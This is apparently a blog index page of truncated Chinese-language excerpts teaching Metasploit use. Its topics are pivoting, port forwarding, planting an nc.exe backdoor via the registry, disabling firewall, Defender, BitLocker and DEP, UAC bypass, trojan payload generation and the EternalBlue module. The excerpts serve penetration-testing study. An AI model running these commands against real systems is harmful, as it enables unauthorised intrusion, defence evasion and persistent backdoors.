星落的博客

Pivoting 跳板/纽扣/支点利用已经控制的一台计算机作为入侵内网的跳板在其他内网计算机看来访问全部来源于跳板机run autoroute -s 192.168.3.0/24#不能访问外网的被攻击目标内网网段自动路由 现实场景利用 win7 攻击 内网 win7扫描内网：use auxiliary/scanner/portscan/tcpPivoting 之端口转发Portfwd利用已经被控计算机，在Kali与攻击目标之间实现端口转发portfwd add -L.

注册表保存着windows几乎全部配置参数如果修改不当，可直接造成系统崩溃修改前完整备份注册表某些注册表的修改是不可逆的常见用途修改、增加启动项 窃取存储于注册表中的机密信息 绕过文件型病毒查杀用注册表添加NC后门服务(meterpreter)upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32reg enumkey -k HKLM\\software\\microsoft\\windows\\c..

1.关闭windows防火墙(需要管理员或system权限)netsh advfirewall set allprofiles state off2.关闭windefendnet stop windefend3.关闭Bitlocker磁盘加密manage -bde -off C:manage -bde -status C:4.关闭DEPbcdedit.exe /set {current} nx AlwaysOff5.杀死放杀毒软件run killa..

实例演示-提权1.获得system账号权限，直接获取会失败，以为win7以上版本电脑含有UAC，因此要绕过UAC。getsystem2.使用ask模块进行弹窗，受害人对电脑不了解，点击“是”，从而绕过UAC。use exploit/windows/local/ask set session 1 run受害者电脑会进行弹窗，点击允许，就可以提权了。3.使用bypassuac模块，利用受信任的通过进程注入的发布者证书，他将产生一个关闭UAC标志的shell。use ..

msfcli使用接口msfconsole使用接口最流行的用户接口 几乎可以使用全部MSF功能 控制台命令支持TAB自动补齐 支持外部命令的执行msf控制台命令banner 查看metasploit版本信息color 颜色提示(true 、false、auto)connect 类似于nc工具show 显示指定的模块、 所有模块search 搜索模块名称或者描述use 使用指定模...

文件位置/usr/share/metasploit-framework/modules/技术功能模块介绍exploits 利用系统漏洞进行攻击的操作，此模块对应每一个具体漏洞的攻击方法payload 成功exploit之后，真正在目标系统执行的代码攻击evasion 专门针对windows木马躲避技术。auxiliary 执行信息收集、枚举、指纹探测、扫描的功能的辅助...

meterpreter介绍meterpreter是一个高级、动态、可扩展的payloadmeterpreter上下文利用更多漏洞发起攻击 后渗透测试阶段一站式操作界面采用完全基于内存的DLL注入式payload注入到合法系统进程并建立stager 基于stager上传和预加载DLL进行扩展模块的注入 基于stager建立的socket连接建立加密的TLS/1.0通信隧道 利用TLS隧道进一步加载后扩展模块(避免网络取证)meterpreter命令介绍help 查看帮助信息..

generate命令介绍-b 过滤坏字符 '\x00，\xff'-e 指定将要使用的加密技术(show encoder查看加密模块)-f 指定输出文件格式-h 查看帮助信息-i 设置加密payload的次数-k 提高速度-x 指定自定义可执行文件作为模板-o 设置输出文件名称实例演示-生成木马1.查看metasploit集成的payloadshow payload2.使用反弹的payloaduse payload windows/shell...

metaspliot简介metaspliot是一个漏洞框架，全称为The Metasploit Framework,简称为MSF。 实例演示--exploit模块介绍1.使用use调用攻击模块use exploit/windows/smb/ms17_010_eternalblue2.设置攻击参数运行命令"show options"。